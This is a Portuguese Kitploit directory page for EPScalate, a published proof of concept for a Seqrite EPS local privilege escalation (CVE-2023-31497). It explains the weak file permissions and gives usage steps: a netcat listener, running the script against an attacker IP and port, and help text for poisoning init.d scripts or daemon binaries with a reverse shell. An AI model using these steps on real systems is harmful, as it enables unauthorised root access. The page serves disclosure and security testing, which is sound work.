Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
EPScalate — Exploit para vulnerabilidade de elevação de privilégio no Seqrite EPS da QuickHeal (CVE-2023-31497). | Kitploit
Ferramentas/GitHubGitHub/0xinfection/epscalate
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoPós-ExploraçãoTestes de Penetração
GitHub0xinfection/epscalate

EPScalate

Exploit para vulnerabilidade de elevação de privilégio no Seqrite EPS da QuickHeal (CVE-2023-31497).

Ver Repositório
192há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

EPScalate

Uma vulnerabilidade de elevação de privilégio no Seqrite Enterprise Endpoint Security Solution (EPS) da QuickHeal. A vulnerabilidade recebeu o ID CVE CVE-2023-31497.

https://user-images.githubusercontent.com/39941993/230790056-87157751-b96c-49a6-81df-bf3126acfbd6.mp4

Detalhes do Fornecedor e do Produto

  • Fornecedor: Quick Heal Technologies Limited
  • Produto: Seqrite Endpoint Security (EPS)
  • Página do Produto: https://www.seqrite.com/endpoint-security/seqrite-endpoint-security
  • Versões Afetadas: Afeta todas as versões anteriores à v8.0.

Detalhes da Vulnerabilidade

O Seqrite endpoint security, com sua instalação padrão, instala-se em /usr/lib/Seqrite/ com permissões de diretório e arquivo muito fracas, concedendo a um usuário local permissão total de leitura/escrita ao conteúdo do diretório. Além disso, o procedimento de instalação instala seus scripts de inicialização em /etc/init.d/, que são graváveis por qualquer usuário. Isso permite que qualquer usuário de baixo privilégio no sistema eleve privilégios para root.

O exploit utiliza 2 vulnerabilidades diferentes introduzidas pelo software para elevar privilégios no sistema. Primeiro, o fato de o aplicativo usar scripts em /etc/init.d/ para iniciar seus processos de verificação, que podem ser editados por qualquer usuário. Segundo, o aplicativo usa objetos compartilhados para carregar dinamicamente código independente de posição (PIC) durante a execução. Na verdade, todos os arquivos de objetos compartilhados executáveis são graváveis por qualquer usuário. Por último, os binários do aplicativo usados para o processo daemon são graváveis por qualquer usuário, o que basicamente significa que qualquer usuário não privilegiado poderia sobrescrever os binários do scanner com um binário de shell reverso para executar código arbitrário como root.

Uso do Exploit

O exploit é um simples arquivo Python que auxilia na exploração da vulnerabilidade.

Passos:

  1. Na máquina do atacante, inicie um listener usando netcat (nc -lvp <porta>) ou metasploit (multi/handler).
  2. Copie/baixe os arquivos epscalate.py e shellcode.c para o sistema alvo.
  3. Execute o arquivo Python com os argumentos adequados (python3 epscalate.py -H 192.168.0.103:9999 -I).
  4. Aguarde o AV recarregar / o sistema reiniciar.
  5. A conexão reversa para o seu listener pode confirmar a execução de código como root.

Ajuda do exploit:

root@kitploit:~
$ python epscalate.py -h

    EPSCALATE - PoC para privesc no Seqrite EPS
                ~ 0xInfection

uso: epscalate.py -H <host>:<porta> <flag_de_técnica>

opções:
  -h, --help            mostra esta mensagem de ajuda e sai
  -H HOSTPORT, --hostport HOSTPORT
                        O IP e a porta da máquina do atacante em escuta no formato <ip>:<porta>
  -B, --daemon-binaries
                        Sobrescreve os binários principais do daemon para elevar privilégios.
  -I, --initd-scripts   Envenena scripts de inicialização bash do /etc/init.d/ com um shell reverso para elevar privilégios.

Suporte

O exploit foi testado em todas as variantes dos sistemas operacionais baseados em Debian e Ubuntu.

Licença e Créditos

O código do exploit foi publicado sob a Licença Apache 2.0. A vulnerabilidade foi divulgada ao fornecedor e foi corrigida no momento da publicação da vulnerabilidade.

Créditos da vulnerabilidade e do exploit: Pinaki Mondal (0xInfection).

Baixar ferramenta